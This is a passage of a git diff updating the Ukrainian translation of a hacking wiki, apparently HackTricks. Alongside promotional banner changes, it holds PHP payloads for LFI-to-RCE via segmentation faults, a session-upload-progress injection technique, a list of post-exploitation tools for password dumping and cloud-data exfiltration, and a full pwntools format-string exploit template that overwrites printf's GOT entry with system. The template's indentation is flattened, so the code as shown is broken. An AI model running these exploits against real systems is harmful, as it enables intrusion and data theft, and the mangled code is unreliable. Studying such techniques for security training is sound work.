+ +[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. + +Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. + +You can check their website and try their engine for **free** at: + +
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Support HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %} +``` + diff --git a/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md index 7019e13f6..5082f063f 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md @@ -1,20 +1,21 @@ # LFI2RCE через segmentation fault +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа взлому AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) у GitHub.
+{% endhint %} -Згідно з описами [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (друга частина) та [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), наступні полезні навантаження спричинили segmentation fault в PHP: +Згідно з описами [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (друга частина) та [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), наступні навантаження спричинили segmentation fault в PHP: ```php // PHP 7.0 include("php://filter/string.strip_tags/resource=/etc/passwd"); @@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd"); // PHP 7.2 include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA"); ``` -Ви повинні знати, що якщо ви **надішлете** запит **POST**, **що містить** **файл**, PHP створить **тимчасовий файл у `/tmp/php<щось>`** з вмістом цього файлу. Цей файл буде **автоматично видалений**, як тільки запит буде оброблений. +Ви повинні знати, що якщо ви **надсилаєте** запит **POST**, **який містить** **файл**, PHP створить **тимчасовий файл у `/tmp/php<щось>`** з вмістом цього файлу. Цей файл буде **автоматично видалений** після обробки запиту. -Якщо ви знайдете **LFI** і вам вдасться **спровокувати** в PHP помилку сегментації, **тимчасовий файл не буде видалений**. Тому ви можете **шукати** його з **вразливістю LFI**, поки не знайдете й виконаєте довільний код. +Якщо ви знайшли **LFI** і вам вдалося **спровокувати** в PHP помилку сегментації, **тимчасовий файл не буде видалений**. Тому ви можете **шукати** його з **вразливістю LFI** до тих пір, поки знайдете й виконаєте довільний код. Ви можете використовувати образ docker [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) для тестування. ```python @@ -69,16 +70,17 @@ bruteforce(charset) if __name__ == "__main__": main() ``` +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/pentesting-web/file-inclusion/via-php_session_upload_progress.md index 0e6afef96..ddde5550f 100644 --- a/pentesting-web/file-inclusion/via-php_session_upload_progress.md +++ b/pentesting-web/file-inclusion/via-php_session_upload_progress.md @@ -1,22 +1,23 @@ # LFI2RCE через PHP\_SESSION\_UPLOAD\_PROGRESS +{% hint style="success" %} +Вивчайте та практикуйте Хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте Хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Основна інформація -Якщо ви знайшли **включення локального файлу**, навіть якщо у вас **немає сесії** і `session.auto_start` вимкнено. Якщо **`session.upload_progress.enabled`** включено і ви надаєте **`PHP_SESSION_UPLOAD_PROGRESS`** у **даних multipart POST**, PHP **увімкне сесію для вас**. +Якщо ви знайшли **Включення локального файлу (LFI)** навіть якщо у вас **немає сесії** і `session.auto_start` вимкнено. Якщо **`session.upload_progress.enabled`** включено і ви надаєте **`PHP_SESSION_UPLOAD_PROGRESS`** у **даних multipart POST**, PHP **увімкне сесію для вас**. ```bash $ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' $ ls -a /var/lib/php/sessions/ @@ -30,33 +31,34 @@ $ ls -a /var/lib/php/sessions/ In the last example the session will contain the string blahblahblah ``` -Зверніть увагу, що з **`PHP_SESSION_UPLOAD_PROGRESS`** ви можете **контролювати дані всередині сесії**, тому якщо ви включите файл сесії, ви можете включити частину, яку контролюєте (наприклад, php shellcode). +За допомогою **`PHP_SESSION_UPLOAD_PROGRESS`** ви можете **контролювати дані всередині сесії**, тому якщо ви включите файл сесії, ви можете включити частину, яку контролюєте (наприклад, php shellcode). {% hint style="info" %} -Хоча більшість посібників в Інтернеті рекомендує встановити `session.upload_progress.cleanup` на `Off` для налагодження. За замовчуванням `session.upload_progress.cleanup` в PHP все ще `On`. Це означає, що ваш прогрес завантаження в сесії буде очищено якнайшвидше. Таким чином це буде **Умова гонки**. +Хоча більшість посібників в Інтернеті рекомендує встановити `session.upload_progress.cleanup` на `Off` для налагодження. За замовчуванням `session.upload_progress.cleanup` в PHP все ще `On`. Це означає, що ваш прогрес завантаження в сесії буде очищено якнайшвидше. Тому це буде **Умова гонки**. {% endhint %} -### The CTF +### Змагання -У [**оригінальному CTF**](https://blog.orange.tw/2018/10/), де цей метод коментується, не вистачило лише використати Умову гонки, але завантажений вміст також повинен був починатися з рядка `@[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md index b91c54e99..c634feeac 100644 --- a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md +++ b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md @@ -1,31 +1,33 @@ -# Атака HTTP Request Smuggling в браузері +# Замаскування запитів HTTP браузера + +{% hint style="success" %} +Вивчайте та вправляйтесь в хакінгу AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтесь в хакінгу GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний мерч PEASS & HackTricks**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} **Перевірте пост [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)** +{% hint style="success" %} +Вивчайте та вправляйтесь в хакінгу AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтесь в хакінгу GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний мерч PEASS & HackTricks**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/post-exploitation.md b/post-exploitation.md index 557cbf644..768e606ae 100644 --- a/post-exploitation.md +++ b/post-exploitation.md @@ -1,29 +1,28 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte) \ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)** ](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## **Локальний лут** -* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Ці скрипти, крім пошуку PE векторів, шукають чутливу інформацію в файловій системі. -* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): Проект **LaZagne** - це відкрите програмне забезпечення, яке використовується для **отримання багатьох паролів**, збережених на локальному комп'ютері. Кожне програмне забезпечення зберігає свої паролі за допомогою різних технік (звичайний текст, API, власні алгоритми, бази даних і т. д.). Цей інструмент був розроблений з метою знаходження цих паролів для найбільш поширених програм. +* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Ці скрипти, крім пошуку векторів PE, шукатимуть чутливу інформацію всередині файлової системи. +* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): Проект **LaZagne** - це відкрите додаток, який використовується для **отримання багатьох паролів**, збережених на локальному комп'ютері. Кожне програмне забезпечення зберігає свої паролі за допомогою різних технік (звичайний текст, API, власні алгоритми, бази даних тощо). Цей інструмент був розроблений з метою знаходження цих паролів для найбільш поширеного програмного забезпечення. ## **Зовнішні сервіси** -* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Цей модуль підключиться до API Confluence за допомогою токена доступу, експортує в PDF та завантажить документи Confluence, до яких має доступ ціль. -* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Інструмент Red Team для виведення файлів з Google Drive цілі, до яких ви (атакуючий) маєте доступ, через API Google Drive. Це включає всі спільні файли, всі файли зі спільних дисків та всі файли з доменних дисків, до яких має доступ ціль. -* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Інструмент Red Team для виведення довідника Google People організації цілі, до якого ви маєте доступ, через API People Google. +* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Цей модуль підключиться до API Confluence за допомогою токена доступу, експортує у PDF та завантажить документи Confluence, до яких має доступ ціль. +* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Інструмент Red Team для виведення файлів з Google Drive цілі, до яких у вас (зловмиснику) є доступ, за допомогою API Google Drive. Це включає всі спільні файли, всі файли зі спільних дисків та всі файли з доменних дисків, до яких має доступ ціль. +* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Інструмент Red Team для виведення довідника Google People організації цілі, до якого у вас є доступ, за допомогою API People Google. * [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Це інструмент, розроблений на Python, який використовує вбудовані API Slack для вилучення 'цікавої' інформації з робочого простору Slack за наявності токена доступу. -* [**Slackhound**](https://github.com/BojackThePillager): Slackhound - це інструмент командного рядка для червоних і синіх команд для швидкого проведення розвідки робочого простору/організації Slack. Slackhound робить збір інформації про користувачів організації, файли, повідомлення тощо швидко доступними для пошуку, а великі об'єкти записуються в CSV для офлайн перегляду. - - +* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound - це інструмент командного рядка для червоних та синіх команд для швидкого проведення розвідки робочого простору/організації Slack. Slackhound робить збір інформації про користувачів, файли, повідомлення тощо організації швидко доступними для пошуку, а великі об'єкти записуються в CSV для офлайн-перегляду. diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md b/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md new file mode 100644 index 000000000..6d9288b17 --- /dev/null +++ b/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md @@ -0,0 +1,166 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} +```python +from pwn import * +from time import sleep + +################### +### CONNECTION #### +################### + +# Define how you want to exploit the binary +LOCAL = True +REMOTETTCP = False +REMOTESSH = False +GDB = False + +# Configure vulnerable binary +LOCAL_BIN = "./tyler" +REMOTE_BIN = "./tyler" #For ssh + +# In order to exploit the format string you may need to append/prepend some string to the payload +# configure them here +PREFIX_PAYLOAD = b"" +SUFFIX_PAYLOAD = b"" +NNUM_ALREADY_WRITTEN_BYTES = 0 +MAX_LENTGH = 999999 #Big num if not restricted + +print(" ====================== ") +print("Selected options:") +print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}") +print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}") +print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}") +print(" ====================== ") + + +def connect_binary(): +global P, ELF_LOADED, ROP_LOADED + +if LOCAL: +P = process(LOCAL_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + +elif REMOTETTCP: +P = remote('10.10.10.10',1338) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + +elif REMOTESSH: +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +P = ssh_shell.process(REMOTE_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(elf)# Find ROP gadgets + + +####################################### +### Get format string configuration ### +####################################### + +def send_payload(payload): +payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD +log.info("payload = %s" % repr(payload)) +if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") +P.sendline(payload) +sleep(0.5) +return P.recv() + + +def get_formatstring_config(): +global P + +for offset in range(1,1000): +connect_binary() +P.clean() + +payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() + +if b"41" in recieved: +for padlen in range(0,4): +if b"41414141" in recieved: +connect_binary() +payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() +print(recieved) +if b"42424242" in recieved: +log.info(f"Found offset ({offset}) and padlen ({padlen})") +return offset, padlen + +else: +connect_binary() +payload = b" " + payload +recieved = send_payload(payload).strip() + + +# In order to exploit a format string you need to find a position where part of your payload +# is being reflected. Then, you will be able to put in the position arbitrary addresses +# and write arbitrary content in those addresses +# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string + +offset, padlen = get_formatstring_config() + + +# In this template, the GOT of printf (the part of the GOT table that points to where the printf +# function resides) is going to be modified by the address of the system inside the PLT (the +# part of the code that will jump to the system function). +# Therefore, next time the printf function is executed, system will be executed instead with the same +# parameters passed to printf + +# In some scenarios you will need to loop1 more time to the vulnerability +# In that cases you need to overwrite a pointer in the .fini_array for example +# Uncomment the commented code below to gain 1 rexecution extra + +#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address +#INIT_LOOP_ADDR = 0x8048614 # Address to go back +SYSTEM_PLT = ELF_LOADED.plt["system"] +P_GOT = ELF_LOADED.got["printf"] + +#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}") +#log.info(f"fini.array address: {hex(P_FINI_ARRAY)}") +log.info(f"System PLT address: {hex(SYSTEM_PLT)}") +log.info(f"Printf GOT address: {hex(P_GOT)}") + +connect_binary() +if GDB and not REMOTETTCP and not REMOTESSH: +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" +sleep(5) + +format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) +#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) +format_string.write(P_GOT, SYSTEM_PLT) +format_string.execute_writes() + +# Now that printf function is executing system you just need to find a place where you can +# control the parameters passed to printf to execute arbitrary code. + +P.interactive() +``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
